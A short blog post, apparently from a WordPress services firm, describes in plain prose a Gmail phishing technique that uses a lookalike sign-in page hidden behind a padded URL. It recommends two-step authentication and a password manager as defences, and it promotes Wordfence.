New Gmail Phishing Attack

phishing attackThere’s a new Gmail phishing attack that has shown up and reeling in even technically savvy people. It was brought up by Wordfence, a company that we use to protect all of our and our clients’ WordPress sites. These guys are great!

This attack is currently being used to target Gmail customers and is also targeting other services.

The way the attack works is that an attacker will send an email to your Gmail account. That email may come from someone you know who has had their account hacked using this technique. It may also include something that looks like an image of an attachment you recognize from the sender.

You click on the image, expecting Gmail to give you a preview of the attachment. Instead, a new tab opens up and you are prompted by Gmail to sign in again. You glance at the location bar and you see in there. It looks like this….

You go ahead and sign in on a fully functional sign-in page that looks like this:

Once you complete sign-in, your account has been compromised View the full story…

Essentially, there is a huge blank space between the first part of the URL and script that comes at the end of it and opens a page that looks like the Gmail login page above.

So, if you are logged into Gmail and it asks you to log in again, don’t.

There are two other ways of avoiding this phishing attack.

One, use 2-step authentication, where you have to enter a code sent to your mobile device before you can log into Gmail. We use this on our Gmail accounts already.

The second, which I asked Wordfence president Mark Maunder about, would be using a password manager like LastPass (which we and our clients use) which would not recognize the URL and not provide the user name and password. We’re not positive about this, though, not having seen it in action.

By the way, these are the same folks at Wordfence that debunked the DNC/John Podesta hack as not necessarily being the Russians. Like I said, these guys know their stuff and I highly recommend Wordfence for a WordPress site. This phishing report is just a sideline for them. They have a free plugin available at and a premium version that preemptively blocks hacking attempts.